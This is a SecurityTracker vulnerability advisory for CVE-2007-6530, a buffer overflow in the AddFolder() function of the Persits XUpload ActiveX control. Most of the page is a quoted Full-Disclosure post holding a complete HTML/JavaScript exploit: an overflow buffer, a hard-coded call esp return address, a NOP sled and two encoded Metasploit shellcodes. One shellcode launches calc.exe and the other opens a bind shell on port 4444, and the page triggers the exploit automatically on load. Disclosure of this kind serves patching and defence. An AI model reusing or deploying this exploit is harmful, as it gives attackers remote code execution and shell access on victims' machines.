SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   XUpload Vendors:   Persits Software, Inc.
XUpload Control Buffer Overflow in AddFolder() Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1019147
SecurityTracker URL:  http://securitytracker.com/id/1019147
CVE Reference:   CVE-2007-6530   (Links to External Site)
Updated:  Jan 29 2008
Original Entry Date:  Dec 28 2007
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Exploit Included:  Yes  
Version(s): 2.1.0.1; possibly earlier versions
Description:   A vulnerability was reported in XUpload. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user, will load the XUpload ActiveX control trigger a buffer overflow in the AddFolder() function and execute arbitrary code on the target system. The code will run with the privileges of the target user.

Elazar Broad reported this vulnerability.

Impact:   A remote user can create HTML that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution:   Version 3.0 is not affected.
Vendor URL:  xupload.aspupload.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Persits Software XUpload Control Buffer Overflow

I tried posting this yesterday, don't know what happened, anyhow, 
my advance apologies for any double posts. I took a shot at writing 
an exploit for this, so here goes. Code is inline and attached. 

-------------------------
<!-- 
written by e.b. 
Persits Software XUpload Control AddFolder() Buffer Overflow Exploit
Tested on Windows XP SP2(fully patched) English, IE6 and IE7 
Thanks to h.d.m. and the Metasploit crew 
-->
<html>
 <head>
  <title>Persits Software XUpload Control AddFolder BoF 
Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
     var buf = 'A'; 
     while (buf.length <= 1387) buf = buf + 'A';


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe 
Size=378 Encoder=Alpha2 http://metasploit.com 
var shellcode1 = 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                          
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                          
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                          
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                          
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                          
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                          
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                          
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                          
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                          
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                          
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                          
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                          
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                          
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                          
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                          
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                          
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                          
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                          
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                          
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                          
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                          
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                          "%4e%31%75%74%38%70%65%77%70%43");

// win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 
http://metasploit.com 
var shellcode2 = 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          
"%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" +
                          
"%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" +
                          
"%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" +
                          
"%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" +
                          
"%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" +
                          
"%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" +
                          
"%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" +
                          
"%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" +
                          
"%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" +
                          
"%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" +
                          
"%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" +
                          
"%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" +
                          
"%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" +
                          
"%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" +
                          
"%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" +
                          
"%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" +
                          
"%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" +
                          
"%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" +
                          
"%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" +
                          
"%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" +
                          
"%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" +
                          
"%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" +
                          
"%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" +
                          
"%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" +
                          
"%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" +
                          
"%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" +
                          
"%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +
                          
"%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" +
                          
"%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" +
                          
"%73%71%78%58%67%61%69%69%56%71%69%62%77%39%6f%6a" +
                          
"%76%51%45%49%6f%4e%30%51%76%53%5a%71%74%72%46%62" +
                          
"%48%30%63%30%6d%6c%49%5a%45%63%5a%62%70%76%39%31" +
                          
"%39%58%4c%4e%69%4d%37%53%5a%33%74%4e%69%4b%52%56" +
                          
"%51%4b%70%6c%33%6f%5a%49%6e%33%72%44%6d%6b%4e%37" +
                          
"%32%76%4c%6e%73%6c%4d%70%7a%76%58%6c%6b%4e%4b%4c" +
                          
"%6b%73%58%53%42%79%6e%6d%63%74%56%6b%4f%30%75%70" +
                          
"%44%4b%4f%79%46%53%6b%70%57%70%52%71%41%50%51%42" +
                          
"%71%41%7a%33%31%42%71%41%41%51%45%66%31%69%6f%5a" +
                          
"%70%50%68%6e%4d%5a%79%56%65%68%4e%33%63%39%6f%58" +
                          
"%56%63%5a%4b%4f%4b%4f%70%37%4b%4f%4a%70%4c%4b%61" +
                          
"%47%6b%4c%4d%53%6b%74%31%74%49%6f%59%46%70%52%59" +
                          
"%6f%4e%30%63%58%6c%30%6f%7a%57%74%61%4f%32%73%4b" +
                          "%4f%68%56%39%6f%38%50%43");


		var eip = unescape("%2B%1C%E1%77"); //advapi32.dll Windows XP SP2 
0x77E11C2B call esp

		var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

		var m = buf + eip + nop + shellcode1;

		obj.AddFolder(m);

   } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:E87F6C8E-16C0-11D3-BEF7-
009027438003">
     Unable to create object
    </object>

 </body>
</html>
-------------------------


--
Click to begin your health care training online.  Request info today.
http://tagline.hushmail.com/fc/Ioyw6h4fOHXz03GDvxZD1mcCUhb7tFhxlYZPpDB6FWB85Ayv3mF0Yg/
Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC